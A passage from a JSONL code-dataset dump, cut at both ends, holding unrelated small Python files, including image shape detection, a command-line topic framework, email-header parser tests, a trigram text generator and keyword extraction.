all_ones(L):\n\t\tnewL = evolve(L) \n\t\treturn 1 + run_generations(newL)\n\n\n\telse:\n\t\tprint (\"Done\")\n\t\treturn 0\n\t\t\n\n\n#---------------------------\n#Original setNewElement\n#---------------------------\n\ndef evolve(L):\n\t\n\t#evolve takes in a list of integers, L, and returns a new list of integers considered to be the \"next generation\"\n\t#N holds the size of the list, L\n\t\n\tN = len(L) \n\treturn[set_new_element(L, i) for i in range(N)]\n\n\n\n#---------------------------\n#Question 4 -- Random\n#---------------------------\n\ndef set_new_element(L, i, x = 0):\n\n\t#SetNewElement returns the NEW list's ith element \n\t#input L: any list of integers \n\t#input i: the index of the new element to return \n\t#input x: an extra,optional input for future use\n\t\n\treturn choice([0,1])\n\n\n\n#---------------------------\n#Check for all 1's and counter\n#---------------------------\n\ndef all_ones(L):\n\n\t# print (\"Checking for all ones\")\n\t# print (L)\n\t# print ()\n\n\tones = [element == 1 for element in L]\n\n\treturn len(L) == sum(ones)\n\n\n\n\n\nprint (run_generations([0, 0, 1]))\n","sub_path":"05_Lights On/5.1/lightsOn_5.1.py","file_name":"lightsOn_5.1.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"149689261","text":"# USAGE\n# python detect_shapes.py --image shapes_and_colors.png\n\n# import the necessary packages\nfrom pyimagesearch.shapedetector import ShapeDetector\nimport argparse\nimport imutils\nimport cv2\nimport numpy as np\nimport copy\nimport math\n\ndef cal_contour_point_val(contours):\n return contours[0][0]+contours[0][1]*800\n\n\ndef find_border_angel(mid_point, image, direction='horizon', reverse_flag=0):\n kernel = [255, 255, 255, 255, 255]\n bias = 100\n image_shape = np.shape(image)\n degree = 0\n if direction == 'horizon':\n bias = min(image_shape[1] - mid_point[0] - int(len(kernel)/2), mid_point[0] - int(len(kernel)/2),\n bias + int(len(kernel)/2))\n if reverse_flag == 0:\n search_range = range(image_shape[0])\n else:\n search_range = reversed(range(image_shape[0]))\n a_point_y = -1\n b_point_y = -1\n for i in search_range:\n a_tmp = np.dot(image[i, mid_point[0] - bias - 2:mid_point[0] - bias + 3], kernel)\n b_tmp = np.dot(image[i, mid_point[0] + bias - 2:mid_point[0] + bias + 3], kernel)\n if a_tmp >= 130050:\n a_point_y = i\n if b_tmp >= 130050:\n b_point_y = i\n if a_point_y != -1 and b_point_y != -1:\n break\n print(\"{} - {}\".format(b_point_y, a_point_y))\n if a_point_y != -1 and b_point_y != -1:\n degree = math.degrees(math.atan2(b_point_y - a_point_y, 2 * bias))\n mid_point[1] = round(math.tan(math.radians(degree))*bias) + a_point_y\n\n elif direction == 'vertical':\n bias = min(image_shape[0] - mid_point[1] - int(len(kernel)/2), mid_point[1] - int(len(kernel)/2),\n bias + int(len(kernel)/2))\n if reverse_flag == 0:\n search_range = range(image_shape[1])\n else:\n search_range = reversed(range(image_shape[1]))\n a_point_x = -1\n b_point_x = -1\n for i in search_range:\n a_tmp = np.dot(image[mid_point[1] - bias - 2:mid_point[1] - bias + 3, i], kernel)\n b_tmp = np.dot(image[mid_point[1] + bias - 2:mid_point[1] + bias + 3, i], kernel)\n if a_tmp >= 130050:\n a_point_x = i\n if b_tmp >= 130050:\n b_point_x = i\n if a_point_x != -1 and b_point_x != -1:\n break\n print(\"{} - {}\".format(b_point_x, a_point_x))\n if a_point_x != -1 and b_point_x != -1:\n degree = 0 - math.degrees(math.atan2(b_point_x - a_point_x, 2 * bias)) #same degree\n mid_point[0] = round(math.tan(math.radians(degree))*bias) + a_point_x\n else:\n print(\"Error!\")\n #print(\"({}, {})\".format(mid_point[0], mid_point[1]))\n return degree\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True,\n help=\"path to the input image\")\nargs = vars(ap.parse_args())\n\n# load the image and resize it to a smaller factor so that\n# the shapes can be approximated better\nimage = cv2.imread(args[\"image\"])\nresized = imutils.resize(image, width=800)\nratio = image.shape[0] / float(resized.shape[0])\n\n# convert the resized image to grayscale, blur it slightly,\n# and threshold it\ngray = cv2.cvtColor(resized, cv2.COLOR_BGR2GRAY)\nblurred = cv2.GaussianBlur(gray, (5, 5), 0)\n'''\na = np.shape(blurred)\ncent_x, cent_y = int(a[1]/2), int(a[0]/2)\nfor i in range(cent_y):\n print(\"{}: {}\".format(i, blurred[i][cent_x]))\nthresh = cv2.threshold(blurred, 90, 255, cv2.THRESH_BINARY)[1]\n'''\ncanny_rst = cv2.Canny(blurred, 50, 150, L2gradient=True)\ncv2.imshow(\"Test\", canny_rst)\ncv2.waitKey(0)\ncnts = cv2.findContours(canny_rst.copy(), cv2.RETR_EXTERNAL,\n\tcv2.CHAIN_APPROX_SIMPLE)\ncnts = cnts[0] if imutils.is_cv2() else cnts[1]\nc = max(cnts, key=cv2.contourArea)\nc = np.array(np.array(c).astype(float)*ratio).astype(int)\n# determine the most extreme points along the contour\nextLeft = tuple(c[c[:, :, 0].argmin()][0])\nextRight = tuple(c[c[:, :, 0].argmax()][0])\nextTop = tuple(c[c[:, :, 1].argmin()][0])\nextBot = tuple(c[c[:, :, 1].argmax()][0])\n\n# draw the outline of the object, then draw each of the\n# extreme points, where the left-most is red, right-most\n# is green, top-most is blue, and bottom-most is teal\ncv2.drawContours(image, [c], -1, (0, 255, 255), 2)\ncv2.circle(image, extLeft, 6, (0, 0, 255), -1)\ncv2.circle(image, extRight, 6, (0, 255, 0), -1)\ncv2.circle(image, extTop, 6, (255, 0, 0), -1)\ncv2.circle(image, extBot, 6, (255, 255, 0), -1)\n\nresize_img = imutils.resize(image, width=800)\n# show the output image\ncv2.imshow(\"Image\", resize_img)\ncv2.waitKey(0)\n","sub_path":"shape-detection/detect_shapes_bk.py","file_name":"detect_shapes_bk.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"141728884","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport tableprint\n\nfrom abc import ABCMeta\nfrom prompt_toolkit import PromptSession, print_formatted_text, HTML\nfrom prompt_toolkit.auto_suggest import AutoSuggestFromHistory\nfrom prompt_toolkit.history import FileHistory\nfrom prompt_toolkit.completion import Completion\n\n\ndef entrypoint(alias=None, doc=\"\", complete=None, base=False):\n \"\"\"Decorate one method as a command entrypoint. like:\n\n @entrypoint()\n def help(self):\n pass\n\n :param alias: give one entrypoint multi command name\n :param doc: the command description\n :return: method\n \"\"\"\n alias = [] if alias is None else alias\n\n def wrap(method):\n \"\"\"\n :param method: decorated method of topic class\n :return:\n \"\"\"\n name = method.__name__\n if name not in alias:\n alias.insert(0, name)\n\n method._entrypoint = True\n method._flags = alias\n method._doc = doc\n method.complete = complete\n method._base = base\n return method\n return wrap\n\n\nclass TopicMeta(ABCMeta):\n\n # all topic class\n # eg: {\"\": DefaultTopic, \"other\": OtherTopic}\n topic_classes = {}\n\n # topic entrypoint per topic\n # eg: {'': {'select_topic': }}\n topic_entrypoints = {}\n\n def __init__(self, name, bases, members):\n super(TopicMeta, self).__init__(name, bases, members)\n mcls = self.__class__\n\n mcls.topic_classes[self._name] = self\n mcls.topic_entrypoints[self._name] = {}\n\n for attr, method in members.items():\n if not getattr(method, \"_entrypoint\", False):\n continue\n mcls.topic_entrypoints[self._name].update(dict.fromkeys(method._flags, method))\n\n for base in bases:\n if not isinstance(base, mcls):\n continue\n mcls.topic_entrypoints[self._name].update(mcls.topic_entrypoints[base._name])\n\n @classmethod\n def create_topic(mcls, name, context):\n \"\"\"create a topic instance\n\n :param mcls: TopicMeta\n :param name: topic name\n :param context: `easier.Context` object\n :return: topic object\n \"\"\"\n if name not in mcls.topic_classes:\n return None\n topic = mcls.topic_classes[name](context)\n return topic\n\n\nclass Topic(object, metaclass=TopicMeta):\n\n _name = None\n\n def __init__(self, context):\n self.context = context\n self.session = PromptSession(\"%s> \" % self.name,\n history=FileHistory(self._history_filename()),\n auto_suggest=AutoSuggestFromHistory())\n\n def release(self):\n \"\"\"relase resource and reference\n \"\"\"\n self.context = None\n self.session = None\n\n def _history_filename(self):\n filename = '.history/{}'.format(self._name)\n dirname = os.path.dirname(filename)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n return filename\n\n def get_entrypoint(self, cmd):\n \"\"\"find entrypoint by command name\n\n :param cmd: command\n :return: entrypoint function object\n \"\"\"\n return TopicMeta.topic_entrypoints.get(self._name, {}).get(cmd, None)\n\n def get_entrypoints(self):\n \"\"\"return all entrypoint in this topic\n\n :return: all entrypoint data\n \"\"\"\n return TopicMeta.topic_entrypoints.get(self._name, {})\n\n @staticmethod\n def _get_topics():\n \"\"\"return all topic name\n \"\"\"\n return {name: obj for name, obj in TopicMeta.topic_classes.items() if bool(name)}\n\n def execute_command(self, cmd, content):\n \"\"\"determine entrypoint funcion, and call it.\n\n :param cmd: command name, also is entrypoint function name\n :param content: command content, also is entrypoint function arguments\n \"\"\"\n func = self.get_entrypoint(cmd)\n if not func:\n self.command_not_found(cmd)\n return\n\n args = [content] if content else []\n\n try:\n func(self, *args)\n except TypeError as e:\n print(e)\n self.lack_command_options(cmd)\n\n @staticmethod\n def command_not_found(cmd):\n print_formatted_text(HTML('invalid command, type \"help\" for more information'))\n\n @staticmethod\n def lack_command_options(cmd):\n print_formatted_text(HTML('command option error'))\n\n @staticmethod\n def topic_not_found(name):\n print_formatted_text(\n HTML('topic \"{}\" not found, type \"list_topics\" for more information'.format(name)))\n\n @property\n def name(self):\n \"\"\"the topic's name, it's a class attribute\n \"\"\"\n return self._name\n\n def _topic_completions(self, content):\n \"\"\" auto complete when typing topic\n\n :param content: command content\n :return:\n \"\"\"\n\n commands = self._get_topics()\n for name, _ in commands.items():\n if content and not name.startswith(content):\n continue\n yield Completion(\n name,\n start_position=-len(content),\n style='bg:seagreen'\n )\n\n @entrypoint(\n doc=\"change topic, eg: > 'select_topic plan'\",\n complete=\"_topic_completions\",\n base=True,\n )\n def select_topic(self, name):\n \"\"\"change topic\n\n :param name: topic name\n :return:\n \"\"\"\n topic = self.context.get_topic(name)\n if not topic:\n self.topic_not_found(name)\n return\n self.context.set_current(topic)\n\n @entrypoint(doc=\"show all topic\", base=True)\n def list_topic(self):\n \"\"\"show topic list\n \"\"\"\n rows = []\n header = (\"topic\", \"description\")\n mx_topic_size = len(header[0])\n mx_desc_size = len(header[1])\n\n for topic, tcls in self._get_topics().items():\n mx_topic_size = max(mx_topic_size, len(topic))\n mx_desc_size = max(mx_desc_size, len(tcls._description))\n rows.append((topic, tcls._description))\n\n rows.sort(key=lambda k: \"z\" if k[0] in [\"default\"] else k[0])\n tableprint.table(rows, (\"topic\", \"description\"), width=(mx_topic_size + 5, mx_desc_size + 5), style=\"clean\")\n\n @entrypoint(alias=[\"quit\"], doc=\"quit program\", base=True)\n def exit(self, *args):\n raise EOFError\n\n @entrypoint(doc=\"clear screen\", base=True)\n def clear(self):\n \"\"\"clear screen\n \"\"\"\n os.system(\"clear\")\n\n @entrypoint(doc=\"show all available commands\", base=True)\n def help(self):\n header = (\"command\", \"description\")\n mx_cmd_size = len(header[0])\n mx_desc_size = len(header[1])\n bases = []\n bizs = []\n\n for name, obj in self.get_entrypoints().items():\n mx_cmd_size = max(mx_cmd_size, len(name))\n mx_desc_size = max(mx_desc_size, len(obj._doc))\n if obj._base:\n bases.append((name, obj._doc))\n else:\n bizs.append((name, obj._doc))\n\n if bizs:\n bizs.sort()\n print_formatted_text(\"\\nbiz commands:\")\n tableprint.table(bizs, header, width=(mx_cmd_size + 5, mx_desc_size + 5), style='grid')\n\n if bases:\n print_formatted_text(\"\\ncommon commands:\")\n bases.sort()\n tableprint.table(bases, header, width=(mx_cmd_size + 5, mx_desc_size + 5), style='grid')\n\n def print_success(self):\n print_formatted_text(\"\")\n print_formatted_text(HTML('SUCCESS!'))\n\n def print_fail(self):\n print_formatted_text(\"\")\n print_formatted_text((HTML('ERROR!')))\n\n\nclass DefaultTopic(Topic):\n\n _name = \"default\"\n _description = \"默认\"\n","sub_path":"easier/topic/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"116972538","text":"from src.const import BCC_KEY\nfrom src.const import CC_KEY\nfrom src.const import DATE_KEY\nfrom src.const import FROM_KEY\nfrom src.const import REPLY_KEY\nfrom src.const import SUBJECT_KEY\nfrom src.const import TO_KEY\nfrom src.crawler import process_date_line\nfrom src.crawler import process_email_line\nfrom src.crawler import process_line\nfrom src.crawler import process_subject_line\n\n\nclass TestProcessEmailLine(object):\n \"\"\"\n Testing line processing function\n \"\"\"\n\n def test_no_recipient_provided(self):\n input_line = 'To: '\n expected = {'TO': []}\n assert expected == process_email_line(input_line, TO_KEY, header='To:')\n assert expected == process_line(input_line)\n\n def test_multiple_recipients_provided(self):\n input_line = (\n 'To: mary.hain@enron.com, '\n 'james.steffes@enron.com, '\n 'joe.hartsoe@enron.com,'\n )\n expected = {\n TO_KEY: [\n 'mary.hain@enron.com',\n 'james.steffes@enron.com',\n 'joe.hartsoe@enron.com',\n ]\n }\n assert expected == process_email_line(\n input_line, TO_KEY, header='To:'\n )\n assert expected == process_line(input_line)\n\n def test_from_input_line(self):\n input_line = 'From: jeff.dasovich@enron.com'\n expected = {\n FROM_KEY: 'jeff.dasovich@enron.com'\n }\n assert expected == process_email_line(\n input_line, FROM_KEY, header='From:'\n )\n assert expected == process_line(input_line)\n\n def test_from_none_line(self):\n input_line = 'From: '\n expected = {FROM_KEY: None}\n assert expected == process_email_line(\n input_line, FROM_KEY, header='From:'\n )\n assert expected == process_line(input_line)\n\n def test_repeating_input_line(self):\n input_line = 'To: \"Steven.J.Kean@enron.com\" '\n expected = {\n TO_KEY: ['Steven.J.Kean@enron.com']\n }\n assert expected == process_email_line(\n input_line, TO_KEY, header='To:'\n )\n assert expected == process_line(input_line)\n\n def test_problematically_formatted_email(self):\n input_line = 'To: pr <.palmer@enron.com>'\n expected = {\n TO_KEY: ['palmer@enron.com']\n }\n assert expected == process_email_line(\n input_line, TO_KEY, header='To:'\n )\n assert expected == process_line(input_line)\n\n def test_cc_line(self):\n input_line = (\n 'Cc: chris.long@enron.com, '\n 'pat.shortridge@enron.com, '\n 'stephen.burns@enron.com,'\n )\n expected = {\n CC_KEY: [\n 'chris.long@enron.com',\n 'pat.shortridge@enron.com',\n 'stephen.burns@enron.com',\n ]\n }\n assert expected == process_email_line(\n input_line, CC_KEY, header='Cc:'\n )\n assert expected == process_line(input_line)\n\n def test_bcc_line(self):\n input_line = 'Bcc: chris.long@enron.com, pat.shortridge@enron.com,'\n expected = {\n BCC_KEY: [\n 'chris.long@enron.com',\n 'pat.shortridge@enron.com',\n ]\n }\n assert expected == process_email_line(\n input_line, BCC_KEY, header='Bcc:'\n )\n assert expected == process_line(input_line)\n\n\nclass TestParseTimeLine(object):\n \"\"\"\n Test to parse date from email line converting date\n \"\"\"\n\n def test_basic_input(self):\n input_line = 'Date: Fri, 15 Sep 2000 06:19:00 -0700 (PDT)'\n expected = {\n DATE_KEY: '2000-09-15T06:19:00-07:00'\n }\n assert expected == process_date_line(input_line)\n assert expected == process_line(input_line)\n\n def test_input_no_text_timezone_provided(self):\n input_line = 'Date: Fri, 15 Sep 2000 06:19:00 -0700 '\n expected = {\n DATE_KEY: '2000-09-15T06:19:00-07:00'\n }\n assert expected == process_date_line(input_line)\n assert expected == process_line(input_line)\n\n def test_parse_improperly_formatted_line(self):\n input_line = 'Date: Fr, 1 S 20 06: 0700 '\n expected = {\n DATE_KEY: None\n }\n assert expected == process_date_line(input_line)\n assert expected == process_line(input_line)\n\n\nclass TestParseSubjectLine(object):\n \"\"\"\n Test parsing subject line\n \"\"\"\n\n def test_basic_input(self):\n input_line = 'Subject: Skilling\\'s office'\n expected = {\n SUBJECT_KEY: 'Skilling\\'s office',\n REPLY_KEY: False,\n }\n assert expected == process_subject_line(input_line)\n assert expected == process_line(input_line)\n\n def test_reply_input(self):\n input_line = 'Subject: Re: CPUC Request for Confidential Information'\n expected = {\n SUBJECT_KEY: 'CPUC Request for Confidential Information',\n REPLY_KEY: True,\n }\n assert expected == process_subject_line(input_line)\n assert expected == process_line(input_line)\n\n\nclass TestParseMultiLineTo(object):\n \"\"\"\n Test parsing to line without heading\n \"\"\"\n\n def test_second_to_line(self):\n input_line = '\tsusan.mara@enron.com, sarah.novosel@enron.com'\n expected = {\n TO_KEY: ['susan.mara@enron.com', 'sarah.novosel@enron.com']\n }\n assert expected == process_line(input_line, last_key=TO_KEY)\n","sub_path":"test/test_crawler.py","file_name":"test_crawler.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"482921000","text":"# Formatting Time and Date Output\n# ===============================\n\nfrom datetime import datetime\nfrom string import ascii_lowercase as letters\nimport pandas as pd\n\nnow = datetime.now()\n\n\ndef fdate(letter):\n try:\n return now.strftime('%' + letter)\n except ValueError:\n return '-'\n\n\ndef main():\n # Times and dates can be formatted using a set of predefined string control codes\n # Date Formatting\n\n # %y/%Y - Year, %a/%A - weekday, %b/%B - month, %d - day of month\n print('The date is', now.strftime('%A %d %B %Y'))\n\n # %I/%H - 12/24 Hour, %M - minute, %S - second, %p - locale's AM/PM\n print('The time is', now.strftime('%I:%M %p'))\n print('The time is', now.strftime('%H:%M'))\n\n # %c - locale's date and time, %x - locale's date, %X - locale's time\n print('The locale datetime is', now.strftime('%c'))\n print('The locale date is', now.strftime('%x'))\n print('The locale time is', now.strftime('%X'))\n\n df = pd.DataFrame({'letter': list(letters)})\n df['date'] = df['letter'].apply(fdate)\n df['DATE'] = df['letter'].apply(lambda x: x.upper()).apply(fdate)\n df.set_index('letter', inplace=True)\n\n df.loc[:, 'Comment'] = ''\n df.loc['a', 'Comment'] = 'Weekday'\n df.loc['b', 'Comment'] = 'Month Name'\n df.loc['j', 'Comment'] = 'Days in the year'\n df.loc['x', 'Comment'] = 'Locale'\n \n print(df) \n \n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Learning Python with Joe Marini/Ch3/formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"400942653","text":"'''carrega o nome do usuario se foi armazenado anteriormente\ncaso ao contrario, pede o usuario que forneça um nome\n'''\nimport json\n\n\ndef get_stored_username():\n '''obtem o nome do usuario caso estiver disponivel'''\n\n filename = 'username.json'\n try:\n with open(filename) as user_obj:\n username = json.load(user_obj) # carrega o jso n\n\n except FileNotFoundError: # caso ele nao achar, retorna none\n return None\n else:\n return username # se achar, retorna o nome\n\n\nget_stored_username()\n\n\ndef get_new_username():\n username = input('What is your name: ')\n filename = 'username.json'\n with open(filename, 'w') as user_obj:\n json.dump(username, user_obj)\n return username\n\n\ndef greet_user():\n '''sauda o usuario'''\n username = get_stored_username()\n if username:\n nome = input('Seu nome está correto?(S/N)')\n if nome == 's':\n print('Welcome back, ' + username) # se tiver, ele printa o nome\n else:\n nome = get_new_username()\n else:\n username = get_new_username()\n print('We will remember when you come back, ' + username)\n\n\ngreet_user()\n","sub_path":"Cap.10/remember_me.py","file_name":"remember_me.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"174796093","text":"\ndef input_string(): # Input string and symbols to find\n uString = input('Enter your string: ')\n symbols = input('Enter symbols: ')\n return uString, symbols\n\ndef solution(string, symbol): # Solution of the task\n result = []\n for word in string.split(): # Check every word in string\n end = len(word) - len(symbol)\n if word[0:len(symbol)] == word[end:] and word[0:len(symbol)] == symbol: # Conditions from the task\n result.append(word)\n return result\n\ndef output(array): # Output the results\n print('Words:', ' '.join(array))\n\nusersString, usersSymbol = input_string()\nprocessed = solution(usersString, usersSymbol)\noutput(processed)\n","sub_path":"Term1Prog/laba9.py","file_name":"laba9.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"323436400","text":"############\n# Trigrams #\n############\nimport os\nimport random\n\n\n# split the sentence into words list\n#words = 'I wish I may I wish I might'.split()\n\n\n\n\n\n\n\n# build the trigrams dict from the list of words\ndef build_trigrams_dic(words):\n trigrams_dic = {}\n for i in range(len(words)-2):\n ##############################################\n # Note: Only hashable type can be keys of dic\n # hashable types are: string, tuple, number\n ##############################################\n # get pair of words and save it in a tuple \n pairwords = tuple(words[i:i+2]) \n follower = words[i+2] # get the following word\n if pairwords in trigrams_dic:\n trigrams_dic[pairwords].append(follower) \n else:\n trigrams_dic[pairwords]=[follower]\n return trigrams_dic\n\ndef clean_up(line):\n import string\n import re\n table = str.maketrans(dict.fromkeys(string.punctuation))\n new_line = line.translate(table)\n\n # found a Roman Numbers for beginng of each chapter\n if re.search('^XI{0,2}|IX|IV|I{2,3}|VI{0,3}$',new_line):\n print(f\"found a Roman Numbers {new_line}\") \n return -1\n if re.search('^End', new_line):\n print(f\"The End of the book. {new_line}\") \n return -2 \n return new_line\n\n\n\n\n\n#################\n# Main part\n#################\nif __name__ == \"__main__\":\n\n ###########\n # start to build trigrams dictionary\n ###########\n\n # read in the txt file for build trigrams dic\n cur_dir = os.getcwd()\n source = cur_dir + '\\sherlock.txt' \n word_list = []\n start_flag = 0 \n # read in all the words from a file to a words_list\n with open(source,\"r\") as in_file:\n # read in each line\n for line in in_file:\n line = line.rstrip(\"\\n\")\n\n if len(line) == 0 :\n continue\n\n if start_flag == 0 :\n w = line.split()\n if len(w) ==1 and w[0] == 'I.': # the Begining of the book\n start_flag = 1 \n #print(f\"-- Begin --\")\n continue\n \"\"\"else:\n\n w = line.split()\n if w[0] == '***':# the End of the book\n #print(f\"-- End --\")\n break\n \"\"\"\n # skip the empty lines and Title part\n if len(line)!=0 and start_flag == 1 :\n # cleaning up the unwanted punctutaions before break it into words\n #print(f\"-- old lines :{line}\")\n line = clean_up(line)\n if line== -1:\n continue\n elif line == -2:\n break\n else:\n # put all words of the file into a single words list\n for word in line.split():\n word_list.append(word)\n\n #print(f\"--word list :{word_list}\")\n\n\n\n\n\n # build the trigrams dic based on the word_list\n trigrams_dic = build_trigrams_dic(word_list)\n # display the dictionary \n #for key, val in trigrams_dic.items():\n # print(f\"{key} => {val}\")\n\n ###########\n # start to generate text file by using the trigram dictionary\n ###########\n # generate a random number between 0 to the length of the dictinoary\n buildup_text = [] \n # 3.1 Picking a random key from the trigrams_dic\n key_list = list(trigrams_dic.keys())\n random_key = random.choice(key_list)\n\n\n buildup_text=list(random_key) \n print(f\"-- Random Start Key:{random_key} --\")\n while random_key in trigrams_dic:\n rand_num = random.randint(0,len(trigrams_dic[random_key]))-1\n third_word = trigrams_dic[random_key][rand_num]\n three_words_list = list(random_key)\n three_words_list.append(third_word)\n\n # get the last two words as new key\n last_two_words = three_words_list[-2:] \n\n # build the text by adding the last word to the list.\n buildup_text.append(three_words_list[2]) \n\n # dictionary key can only be the hashable types (string,set,tuple)\n # so convert the list to tuple for the dictionary key\n random_key = tuple(last_two_words)\n\n print(f\"-- Can't find the key {random_key}.--\")\n #print(f\"-- New text --\")\n #print(f\"{buildup_text}\")\n\n","sub_path":"students/zhen_yang/lesson04/trigrams.py","file_name":"trigrams.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"403542233","text":"import itertools\n\nN, K = map(int, input().split())\nans = []\nfor i in range(2, N + 1):\n ans.append([1, i])\n\n\"\"\"\n全ての組み合わせは N_C_2\n1を中心にスターグラフを作る\n2,3,...,Nの中での組み合わせは N-1_C_2、これらの距離は2\n2,3,...,Nの中で、(N-1_C_2 - K) 個の辺を張れば、\n距離2の組み合わせがK個残る\n\nN-1_C_2 - K < 0 となる時、構築不可\n\"\"\"\n\nif (N - 1) * (N - 2) // 2 - K < 0:\n print(-1)\n exit()\nelse:\n comb = list(itertools.combinations(range(2, N + 1), 2))\n for i in range((N - 1) * (N - 2) // 2 - K):\n u = comb[i][0]\n v = comb[i][1]\n ans.append([u, v])\n print(len(ans))\n for i in ans:\n print(*i)\n","sub_path":"Python_codes/p02997/s223603693.py","file_name":"s223603693.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"464436582","text":"from sklearn.feature_extraction.text import CountVectorizer\nimport spacy\nfrom transformers import AutoModel, AutoTokenizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sentence_transformers import SentenceTransformer\nimport json\nimport schedule\nimport time\n\ndef get_keywords(text: str):\n # n_gram = keyword where n_gram_range = (lower boundary of number of words, upper boundary)\n n_gram_range = (2, 4)\n\n # stop words are words that are presumed to be uniformative, ex. \"like\", \"him\", \"the\"\n stop_words = \"english\"\n\n # Extract candidate words/phrases\n # CountVectorizer is a sklearn function that converts words to vectors as per the Bag of Words analogy (frequency of words in text)\n count = CountVectorizer(ngram_range=n_gram_range,\n stop_words=stop_words).fit([text])\n all_candidates = count.get_feature_names()\n\n # FINDING NOUNS\n\n # Load the Spacy model for NLP\n nlp = spacy.load('en_core_web_sm')\n doc = nlp(text)\n\n # Create a set for noun chunks (base noun phrases) within the doc\n # Uses the spacy built-in models to find noun chunks\n noun_phrases = set(chunk.text.strip().lower() for chunk in doc.noun_chunks)\n\n # Create an empty set (for nouns within in the text), only want unique values\n nouns = set()\n # doc refers to the text\n # Uses spacy model to determine whether word is noun and add to noun set\n for token in doc:\n if token.pos_ == \"NOUN\":\n nouns.add(token.text)\n\n # Joins the noun and noun_phrases set into an all_nouns set\n all_nouns = nouns.union(noun_phrases)\n\n # Filter for candidate that are in both all_nouns and all_candidates, add to list candidates\n candidates = list(\n filter(lambda candidate: candidate in all_nouns, all_candidates))\n\n # CALCULATING BEST KEYWORDS\n\n # Defining the BERT NLP Embedding model used\n # Encodes each word as a specific vector in relation to other words, values are determined through semantics learned by the BERT model\n model = SentenceTransformer('distilbert-base-nli-mean-tokens')\n text_embedding = model.encode([doc])\n candidate_embeddings = model.encode(candidates)\n\n # Use cosine similarity between text and candidate to determine proximity, and therefore top candidates\n # Generate top 5 keywords\n top_k = 1\n distances = cosine_similarity(text_embedding, candidate_embeddings)\n keywords = [candidates[index] for index in distances.argsort()[0][-top_k:]]\n\n print(keywords)\n return keywords\n","sub_path":"Main/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"228161361","text":"from typing import Any\n\nimport proto\n\nclass AdCustomizerPlaceholderFieldEnum(proto.Message):\n class AdCustomizerPlaceholderField(proto.Enum):\n UNSPECIFIED = 0\n UNKNOWN = 1\n INTEGER = 2\n PRICE = 3\n DATE = 4\n STRING = 5\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n ) -> None: ...\n","sub_path":"google-stubs/ads/googleads/v12/enums/types/ad_customizer_placeholder_field.pyi","file_name":"ad_customizer_placeholder_field.pyi","file_ext":"pyi","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"114630031","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn import cluster\r\nfrom sklearn import metrics\r\nfrom sklearn import neighbors\r\nimport pysal as ps\r\n\r\n## k nearest neighbors demo\r\ndat=pd.read_csv('../data/trt_coords.csv',index_col=0)\r\ndist=metrics.pairwise.pairwise_distances(dat.ix[:,['X1','X2']])\r\n\r\n## Connectivity - from spatial weights\r\nwknn=ps.knnW_from_shapefile('../data/trt_test.shp',k=4) # version with rikers removed\r\nconn_sp=wknn.full()[0]\r\n\r\n# wqn=ps.queen_from_shapefile('../data/trt_test.shp') # version with rikers removed\r\n# conn_sp=wqn.full()[0]\r\n\r\n## Connectivity - from borough membership\r\ncy=dat.County\r\ncy[(cy==47) | (cy==81)]=4781\r\ncy=cy.values\r\n\r\nconn=np.zeros((len(cy),len(cy)))\r\n\r\nfor r in range(len(conn)):\r\n conn[r,np.where(cy==cy[r])]=1\r\n\r\n## Connectivity - combined\r\nconn=conn*conn_sp\r\n\r\n## Regionalization\r\nnp.random.seed(830308)\r\nclust=cluster.AgglomerativeClustering(n_clusters=9,connectivity=conn,linkage='ward')\r\nfit=clust.fit(dist)\r\npd.DataFrame({'GEOID':dat.GEOID,'cluster':fit.labels_}).to_csv('../data/reg_test.csv')\r\n","sub_path":"code/build_regions.py","file_name":"build_regions.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"162756161","text":"import numpy as np\nimport MDAnalysis\nimport matplotlib.pyplot as plt\nimport math\n\nu = MDAnalysis.Universe('longrun.tpr', 'longrun.xtc')\ntpr_resid_from_one=False\nprint(u)\n#------FUNCTIONS----------\n\n# read file data into a 2-d array\ndef get_file_string_array(file_name):\n try:\n file = open(file_name, \"r\")\n except IOError:\n print('Error: file (%s) not found!\\n' % (file_name))\n sys.exit()\n lines = file.readlines()\n file.close()\n array = []\n for line in lines:\n array.append(line.split())\n return array\n\n# Get blocks of data by their name\ndef get_blocks(array, block):\n bl = []\n for i in range(len(array)):\n if ((len(array[i]) == 3) and (array[i][1] == block)):\n a = i + 1; break\n print('(%s) opening index: (%s)' % (block, a))\n for i in range(a, len(array)):\n if (not array[i]):\n b = i\n break\n print('(%s) closing index: (%s)' % (block, b))\n for i in 